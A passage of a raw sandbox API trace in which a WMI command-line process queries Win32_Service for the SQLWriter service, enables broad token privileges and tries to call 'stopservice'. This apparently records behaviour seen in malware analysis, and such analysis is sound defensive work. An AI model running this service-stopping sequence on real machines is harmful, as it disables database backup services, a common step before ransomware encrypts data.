pVal=0x89cec8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0283.313] free (_Block=0x2b3aea0) [0283.313] malloc (_Size=0xc) returned 0x2b3ae40 [0283.313] IWbemQualifierSet:Get (in: This=0x2dbafd0, wszName="write", lFlags=0, pVal=0x89cec8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x89cec8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0283.313] free (_Block=0x2b3ae40) [0283.313] malloc (_Size=0xc) returned 0x2b3ae28 [0283.313] malloc (_Size=0xc) returned 0x2b3aeb8 [0283.314] IWbemQualifierSet:Get (in: This=0x2dbafd0, wszName="Description", lFlags=0, pVal=0x89cea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x89cea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0283.314] free (_Block=0x2b3aeb8) [0283.314] malloc (_Size=0xc) returned 0x2b3ae58 [0283.314] lstrlenA (lpString="Not Available") returned 13 [0283.314] malloc (_Size=0x1c) returned 0x2b3ba28 [0283.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa21d94, cbMultiByte=-1, lpWideCharStr=0x2b3ba28, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0283.314] free (_Block=0x2b3ba28) [0283.314] IUnknown:Release (This=0x2dbafd0) returned 0x0 [0283.314] malloc (_Size=0x24) returned 0x2b3ba28 [0283.314] malloc (_Size=0xc) returned 0x2b3ae10 [0283.314] malloc (_Size=0x24) returned 0x2b3ba58 [0283.314] malloc (_Size=0x38) returned 0x2b3ba88 [0283.314] malloc (_Size=0x24) returned 0x2b3bac8 [0283.314] free (_Block=0x2b3ba58) [0283.314] free (_Block=0x2b3ba28) [0283.314] free (_Block=0x2b3b9f8) [0283.314] free (_Block=0x2b3ae28) [0283.314] free (_Block=0x2b3ae58) [0283.314] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0283.315] IWbemClassObject:GetMethodQualifierSet (in: This=0x2e10468, wszMethod="StopService", ppQualSet=0x89d3d4 | out: ppQualSet=0x89d3d4*=0x2de4180) returned 0x0 [0283.315] malloc (_Size=0xc) returned 0x2b3aeb8 [0283.315] IWbemQualifierSet:Get (in: This=0x2de4180, wszName="Implemented", lFlags=0, pVal=0x89d3bc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x89d3bc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0283.315] free (_Block=0x2b3aeb8) [0283.315] malloc (_Size=0xc) returned 0x2b3ae70 [0283.315] malloc (_Size=0xc) returned 0x2b3ae28 [0283.315] IWbemQualifierSet:Get (in: This=0x2de4180, wszName="Description", lFlags=0, pVal=0x89d3ac*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x89d3ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x0), plFlavor=0x0) returned 0x0 [0283.316] free (_Block=0x2b3ae28) [0283.316] malloc (_Size=0xc) returned 0x2b3ae58 [0283.317] IUnknown:Release (This=0x2de4180) returned 0x0 [0283.317] malloc (_Size=0x38) returned 0x2b3b9f8 [0283.317] malloc (_Size=0x38) returned 0x2b3ba38 [0283.317] malloc (_Size=0x24) returned 0x2b3baf8 [0283.317] malloc (_Size=0xc) returned 0x2b3ae28 [0283.317] malloc (_Size=0x38) returned 0x2b3bb28 [0283.317] malloc (_Size=0x38) returned 0x2b3bb68 [0283.317] malloc (_Size=0x24) returned 0x2b3bba8 [0283.317] malloc (_Size=0x28) returned 0x2b3bbd8 [0283.317] malloc (_Size=0x38) returned 0x2b3bc08 [0283.317] malloc (_Size=0x38) returned 0x2b3bc48 [0283.317] malloc (_Size=0x24) returned 0x2b3bc88 [0283.317] free (_Block=0x2b3bba8) [0283.317] free (_Block=0x2b3bb68) [0283.317] free (_Block=0x2b3bb28) [0283.317] free (_Block=0x2b3baf8) [0283.317] free (_Block=0x2b3ba38) [0283.317] free (_Block=0x2b3b9f8) [0283.317] IUnknown:Release (This=0x2e10660) returned 0x0 [0283.317] free (_Block=0x2b3bac8) [0283.317] free (_Block=0x2b3ba88) [0283.317] free (_Block=0x2b3b9b8) [0283.317] IWbemClassObject:NextMethod (in: This=0x2e10468, lFlags=0, pstrName=0x89d478*=0x0, ppInSignature=0x89d474*=0x0, ppOutSignature=0x89d470*=0x0 | out: pstrName=0x89d478*="PauseService", ppInSignature=0x89d474*=0x0, ppOutSignature=0x89d470*=0x2de74e8) returned 0x0 [0283.318] lstrlenW (lpString="PauseService") returned 12 [0283.318] lstrlenW (lpString="stopservice") returned 11 [0283.318] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0283.318] IUnknown:Release (This=0x2de74e8) returned 0x0 [0283.318] IWbemClassObject:NextMethod (in: This=0x2e10468, lFlags=0, pstrName=0x89d478*=0x0, ppInSignature=0x89d474*=0x0, ppOutSignature=0x89d470*=0x0 | out: pstrName=0x89d478*="ResumeService", ppInSignature=0x89d474*=0x0, ppOutSignature=0x89d470*=0x2de74e8) returned 0x0 [0283.318] lstrlenW (lpString="ResumeService") returned 13 [0283.318] lstrlenW (lpString="stopservice") returned 11 [0283.318] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0283.318] IUnknown:Release (This=0x2de74e8) returned 0x0 [0283.318] IWbemClassObject:NextMethod (in: This=0x2e10468, lFlags=0, pstrName=0x89d478*=0x0, ppInSignature=0x89d474*=0x0, ppOutSignature=0x89d470*=0x0 | out: pstrName=0x89d478*="InterrogateService", ppInSignature=0x89d474*=0x0, ppOutSignature=0x89d470*=0x2de74e8) returned 0x0 [0283.318] lstrlenW (lpString="InterrogateService") returned 18 [0283.318] lstrlenW (lpString="stopservice") returned 11 [0283.318] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0283.318] IUnknown:Release (This=0x2de74e8) returned 0x0 [0283.318] IWbemClassObject:NextMethod (in: This=0x2e10468, lFlags=0, pstrName=0x89d478*=0x0, ppInSignature=0x89d474*=0x0, ppOutSignature=0x89d470*=0x0 | out: pstrName=0x89d478*="UserControlService", ppInSignature=0x89d474*=0x2e10660, ppOutSignature=0x89d470*=0x2e12910) returned 0x0 [0283.318] lstrlenW (lpString="UserControlService") returned 18 [0283.318] lstrlenW (lpString="stopservice") returned 11 [0283.318] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0283.319] IUnknown:Release (This=0x2e10660) returned 0x0 [0283.319] IUnknown:Release (This=0x2e12910) returned 0x0 [0283.319] IWbemClassObject:NextMethod (in: This=0x2e10468, lFlags=0, pstrName=0x89d478*=0x0, ppInSignature=0x89d474*=0x0, ppOutSignature=0x89d470*=0x0 | out: pstrName=0x89d478*="Create", ppInSignature=0x89d474*=0x2e10660, ppOutSignature=0x89d470*=0x2e148e0) returned 0x0 [0283.319] lstrlenW (lpString="Create") returned 6 [0283.319] lstrlenW (lpString="stopservice") returned 11 [0283.319] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0283.320] IUnknown:Release (This=0x2e10660) returned 0x0 [0283.320] IUnknown:Release (This=0x2e148e0) returned 0x0 [0283.320] IWbemClassObject:NextMethod (in: This=0x2e10468, lFlags=0, pstrName=0x89d478*=0x0, ppInSignature=0x89d474*=0x0, ppOutSignature=0x89d470*=0x0 | out: pstrName=0x89d478*="Change", ppInSignature=0x89d474*=0x2e10660, ppOutSignature=0x89d470*=0x2e14660) returned 0x0 [0283.320] lstrlenW (lpString="Change") returned 6 [0283.320] lstrlenW (lpString="stopservice") returned 11 [0283.320] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0283.320] IUnknown:Release (This=0x2e10660) returned 0x0 [0283.320] IUnknown:Release (This=0x2e14660) returned 0x0 [0283.320] IWbemClassObject:NextMethod (in: This=0x2e10468, lFlags=0, pstrName=0x89d478*=0x0, ppInSignature=0x89d474*=0x0, ppOutSignature=0x89d470*=0x0 | out: pstrName=0x89d478*="ChangeStartMode", ppInSignature=0x89d474*=0x2e10660, ppOutSignature=0x89d470*=0x2e12a80) returned 0x0 [0283.320] lstrlenW (lpString="ChangeStartMode") returned 15 [0283.320] lstrlenW (lpString="stopservice") returned 11 [0283.320] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0283.320] IUnknown:Release (This=0x2e10660) returned 0x0 [0283.320] IUnknown:Release (This=0x2e12a80) returned 0x0 [0283.320] IWbemClassObject:NextMethod (in: This=0x2e10468, lFlags=0, pstrName=0x89d478*=0x0, ppInSignature=0x89d474*=0x0, ppOutSignature=0x89d470*=0x0 | out: pstrName=0x89d478*="Delete", ppInSignature=0x89d474*=0x0, ppOutSignature=0x89d470*=0x2de74e8) returned 0x0 [0283.320] lstrlenW (lpString="Delete") returned 6 [0283.320] lstrlenW (lpString="stopservice") returned 11 [0283.320] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0283.321] IUnknown:Release (This=0x2de74e8) returned 0x0 [0283.321] IWbemClassObject:NextMethod (in: This=0x2e10468, lFlags=0, pstrName=0x89d478*=0x0, ppInSignature=0x89d474*=0x0, ppOutSignature=0x89d470*=0x0 | out: pstrName=0x89d478*="GetSecurityDescriptor", ppInSignature=0x89d474*=0x0, ppOutSignature=0x89d470*=0x2e10660) returned 0x0 [0283.321] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0283.321] lstrlenW (lpString="stopservice") returned 11 [0283.321] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0283.321] IUnknown:Release (This=0x2e10660) returned 0x0 [0283.321] IWbemClassObject:NextMethod (in: This=0x2e10468, lFlags=0, pstrName=0x89d478*=0x0, ppInSignature=0x89d474*=0x0, ppOutSignature=0x89d470*=0x0 | out: pstrName=0x89d478*="SetSecurityDescriptor", ppInSignature=0x89d474*=0x2e10660, ppOutSignature=0x89d470*=0x2e12910) returned 0x0 [0283.321] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0283.321] lstrlenW (lpString="stopservice") returned 11 [0283.321] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0283.321] IUnknown:Release (This=0x2e10660) returned 0x0 [0283.321] IUnknown:Release (This=0x2e12910) returned 0x0 [0283.321] IWbemClassObject:NextMethod (in: This=0x2e10468, lFlags=0, pstrName=0x89d478*=0x0, ppInSignature=0x89d474*=0x0, ppOutSignature=0x89d470*=0x0 | out: pstrName=0x89d478*=0x0, ppInSignature=0x89d474*=0x0, ppOutSignature=0x89d470*=0x0) returned 0x40005 [0283.321] IUnknown:Release (This=0x2e10468) returned 0x0 [0283.321] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0283.321] lstrlenW (lpString="SET") returned 3 [0283.321] lstrlenW (lpString="call") returned 4 [0283.321] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0283.322] lstrlenW (lpString="CREATE") returned 6 [0283.322] lstrlenW (lpString="call") returned 4 [0283.322] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0283.322] free (_Block=0x2b32be0) [0283.322] malloc (_Size=0x4) returned 0x2b32ee8 [0283.322] lstrlenW (lpString="GET") returned 3 [0283.322] lstrlenW (lpString="call") returned 4 [0283.322] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0283.322] lstrlenW (lpString="LIST") returned 4 [0283.322] lstrlenW (lpString="call") returned 4 [0283.322] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0283.322] lstrlenW (lpString="ASSOC") returned 5 [0283.322] lstrlenW (lpString="call") returned 4 [0283.322] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0283.322] WbemLocator:IUnknown:AddRef (This=0x2db4838) returned 0x3 [0283.322] free (_Block=0x2b32788) [0283.322] lstrlenW (lpString="") returned 0 [0283.322] lstrlenW (lpString="NQDPDE") returned 6 [0283.322] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0283.322] lstrlenW (lpString="NQDPDE") returned 6 [0283.322] malloc (_Size=0xe) returned 0x2b3ae40 [0283.322] lstrlenW (lpString="NQDPDE") returned 6 [0283.322] GetCurrentThreadId () returned 0x10e4 [0283.322] GetCurrentProcess () returned 0xffffffff [0283.322] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x89f550 | out: TokenHandle=0x89f550*=0x2f8) returned 1 [0283.322] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x89f54c | out: TokenInformation=0x0, ReturnLength=0x89f54c) returned 0 [0283.323] malloc (_Size=0x118) returned 0x2b3b9b8 [0283.323] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x2b3b9b8, TokenInformationLength=0x118, ReturnLength=0x89f54c | out: TokenInformation=0x2b3b9b8, ReturnLength=0x89f54c) returned 1 [0283.323] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x2b3b9b8*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0283.323] free (_Block=0x2b3b9b8) [0283.323] CloseHandle (hObject=0x2f8) returned 1 [0283.323] lstrlenW (lpString="GET") returned 3 [0283.323] lstrlenW (lpString="call") returned 4 [0283.323] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0283.323] lstrlenW (lpString="LIST") returned 4 [0283.323] lstrlenW (lpString="call") returned 4 [0283.323] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0283.323] lstrlenW (lpString="SET") returned 3 [0283.323] lstrlenW (lpString="call") returned 4 [0283.323] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0283.323] lstrlenW (lpString="CALL") returned 4 [0283.323] lstrlenW (lpString="call") returned 4 [0283.323] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0283.323] ??0CHString@@QAE@XZ () returned 0x89f510 [0283.323] GetCurrentThreadId () returned 0x10e4 [0283.323] malloc (_Size=0xc) returned 0x2b3ae88 [0283.324] malloc (_Size=0xc) returned 0x2b3aea0 [0283.324] malloc (_Size=0xc) returned 0x2b3aeb8 [0283.324] malloc (_Size=0xc) returned 0x2b3aed0 [0283.324] malloc (_Size=0xc) returned 0x2b398e0 [0283.324] SysStringLen (param_1="\\\\") returned 0x2 [0283.324] SysStringLen (param_1="NQDPDE") returned 0x6 [0283.324] malloc (_Size=0xc) returned 0x2b3be08 [0283.324] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0283.324] SysStringLen (param_1="\\") returned 0x1 [0283.324] malloc (_Size=0xc) returned 0x2b3bfd0 [0283.324] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0283.324] SysStringLen (param_1="root\\cimv2") returned 0xa [0283.325] free (_Block=0x2b3be08) [0283.325] free (_Block=0x2b398e0) [0283.325] free (_Block=0x2b3aed0) [0283.325] free (_Block=0x2b3aeb8) [0283.325] free (_Block=0x2b3aea0) [0283.325] free (_Block=0x2b3ae88) [0283.325] malloc (_Size=0xc) returned 0x2b3bd48 [0283.325] malloc (_Size=0xc) returned 0x2b3bfb8 [0283.325] malloc (_Size=0xc) returned 0x2b3bf28 [0283.325] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2db4838, strNetworkResource="\\\\NQDPDE\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68564 | out: ppNamespace=0xa68564*=0x2e13758) returned 0x0 [0283.337] free (_Block=0x2b3bf28) [0283.337] free (_Block=0x2b3bfb8) [0283.337] free (_Block=0x2b3bd48) [0283.337] CoSetProxyBlanket (pProxy=0x2e13758, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0283.337] free (_Block=0x2b3bfd0) [0283.337] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0283.337] ??0CHString@@QAE@XZ () returned 0x89f508 [0283.337] GetCurrentThreadId () returned 0x10e4 [0283.337] malloc (_Size=0x38) returned 0x2b3b9b8 [0283.337] malloc (_Size=0x28) returned 0x2b3b9f8 [0283.337] malloc (_Size=0x28) returned 0x2b3ba28 [0283.337] malloc (_Size=0x38) returned 0x2b3ba58 [0283.337] malloc (_Size=0x38) returned 0x2b3ba98 [0283.337] malloc (_Size=0x24) returned 0x2b3bad8 [0283.337] malloc (_Size=0xc) returned 0x2b3ae88 [0283.338] lstrlenA (lpString="") returned 0 [0283.338] malloc (_Size=0x2) returned 0x2b32788 [0283.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x2b32788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0283.338] free (_Block=0x2b32788) [0283.338] malloc (_Size=0x38) returned 0x2b3bb08 [0283.338] malloc (_Size=0x24) returned 0x2b3bb48 [0283.338] malloc (_Size=0xc) returned 0x2b3aea0 [0283.338] free (_Block=0x2b3ae88) [0283.338] IWbemServices:GetObject (in: This=0x2e13758, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x89f4e0*=0x0, ppCallResult=0x0 | out: ppObject=0x89f4e0*=0x2e10468, ppCallResult=0x0) returned 0x0 [0283.403] malloc (_Size=0xc) returned 0x2b3aeb8 [0283.403] IWbemClassObject:GetMethod (in: This=0x2e10468, wszName="stopservice", lFlags=0, ppInSignature=0x89f4fc, ppOutSignature=0x89f4dc | out: ppInSignature=0x89f4fc*=0x0, ppOutSignature=0x89f4dc*=0x2e13890) returned 0x0 [0283.403] free (_Block=0x2b3aeb8) [0283.403] IUnknown:Release (This=0x2e13890) returned 0x0 [0283.403] IUnknown:Release (This=0x2e10468) returned 0x0 [0283.403] ??0CHString@@QAE@XZ () returned 0x89f3c0 [0283.403] GetCurrentThreadId () returned 0x10e4 [0283.403] malloc (_Size=0xc) returned 0x2b3aeb8 [0283.403] lstrlenA (lpString="") returned 0 [0283.403] malloc (_Size=0x2) returned 0x2b32788 [0283.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x2b32788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0283.403] free (_Block=0x2b32788) [0283.403] malloc (_Size=0xc) returned 0x2b3ae88 [0283.403] lstrlenA (lpString="") returned 0 [0283.403] malloc (_Size=0x2) returned 0x2b32788 [0283.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x2b32788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0283.403] free (_Block=0x2b32788) [0283.403] malloc (_Size=0xc) returned 0x2b3aed0 [0283.404] free (_Block=0x2b3ae88) [0283.404] malloc (_Size=0xc) returned 0x2b3ae88 [0283.404] lstrlenA (lpString="SELECT * FROM ") returned 14 [0283.404] malloc (_Size=0x1e) returned 0x2b3bb78 [0283.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa24354, cbMultiByte=-1, lpWideCharStr=0x2b3bb78, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0283.404] free (_Block=0x2b3bb78) [0283.404] malloc (_Size=0xc) returned 0x2b398e0 [0283.404] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0283.404] SysStringLen (param_1="Win32_Service") returned 0xd [0283.404] free (_Block=0x2b3ae88) [0283.404] malloc (_Size=0xc) returned 0x2b3ae88 [0283.404] malloc (_Size=0xc) returned 0x2b3bee0 [0283.404] lstrlenA (lpString=" WHERE ") returned 7 [0283.404] malloc (_Size=0x10) returned 0x2b3bf58 [0283.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa237a8, cbMultiByte=-1, lpWideCharStr=0x2b3bf58, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0283.404] free (_Block=0x2b3bf58) [0283.404] malloc (_Size=0xc) returned 0x2b3bfb8 [0283.404] SysStringLen (param_1=" WHERE ") returned 0x7 [0283.404] SysStringLen (param_1="name like '%%SQLWriter%%'") returned 0x19 [0283.405] malloc (_Size=0xc) returned 0x2b3bce8 [0283.405] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0283.405] SysStringLen (param_1=" WHERE name like '%%SQLWriter%%'") returned 0x20 [0283.405] free (_Block=0x2b398e0) [0283.405] free (_Block=0x2b3bfb8) [0283.405] free (_Block=0x2b3bee0) [0283.405] free (_Block=0x2b3ae88) [0283.405] malloc (_Size=0xc) returned 0x2b3beb0 [0283.405] IWbemServices:ExecQuery (in: This=0x2e13758, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%SQLWriter%%'", lFlags=48, pCtx=0x0, ppEnum=0x89f3cc | out: ppEnum=0x89f3cc*=0x2e148f0) returned 0x0 [0283.420] free (_Block=0x2b3beb0) [0283.420] CoSetProxyBlanket (pProxy=0x2e148f0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0283.426] IEnumWbemClassObject:Next (in: This=0x2e148f0, lTimeout=-1, uCount=0x1, apObjects=0x89f3c8, puReturned=0x89f3b8 | out: apObjects=0x89f3c8*=0x0, puReturned=0x89f3b8*=0x0) returned 0x1 [0284.748] IUnknown:Release (This=0x2e148f0) returned 0x0 [0284.752] free (_Block=0x2b3bce8) [0284.752] free (_Block=0x2b3aed0) [0284.753] free (_Block=0x2b3aeb8) [0284.753] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0284.753] free (_Block=0x2b3aea0) [0284.753] free (_Block=0x2b3bad8) [0284.753] free (_Block=0x2b3ba98) [0284.753] free (_Block=0x2b3ba58) [0284.753] free (_Block=0x2b3ba28) [0284.753] free (_Block=0x2b3b9f8) [0284.753] free (_Block=0x2b3bb48) [0284.753] free (_Block=0x2b3bb08) [0284.753] free (_Block=0x2b3b9b8) [0284.753] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0284.765] GetCurrentThreadId () returned 0x10e4 [0284.765] ??0CHString@@QAE@PBG@Z () returned 0x89f580 [0284.765] ??YCHString@@QAEABV0@PBG@Z () returned 0x89f580 [0284.765] malloc (_Size=0x800) returned 0x2b3c0c0 [0284.765] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x2b3c0c0, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0284.765] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0284.765] malloc (_Size=0x1c) returned 0x2b3b9b8 [0284.765] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x2b3b9b8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0284.765] __iob_func () returned 0x776f2608 [0284.766] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 27 [0284.766] __iob_func () returned 0x776f2608 [0284.766] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0284.767] free (_Block=0x2b3b9b8) [0284.767] free (_Block=0x2b3c0c0) [0284.767] ??1CHString@@QAE@XZ () returned 0x1 [0284.767] WbemLocator:IUnknown:Release (This=0x2e13758) returned 0x0 [0284.768] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0284.768] _kbhit () returned 0x0 [0284.776] free (_Block=0x2b32ee8) [0284.776] free (_Block=0x2b3ad20) [0284.776] free (_Block=0x2b3ad68) [0284.776] free (_Block=0x2b3ad50) [0284.776] free (_Block=0x2b3ad08) [0284.777] free (_Block=0x2b3b058) [0284.777] free (_Block=0x2b3b188) [0284.777] free (_Block=0x2b39da8) [0284.777] free (_Block=0x2b3b208) [0284.777] free (_Block=0x2b3ad80) [0284.777] free (_Block=0x2b32cc0) [0284.777] free (_Block=0x2b30520) [0284.777] free (_Block=0x2b3bc88) [0284.777] free (_Block=0x2b3abe8) [0284.777] free 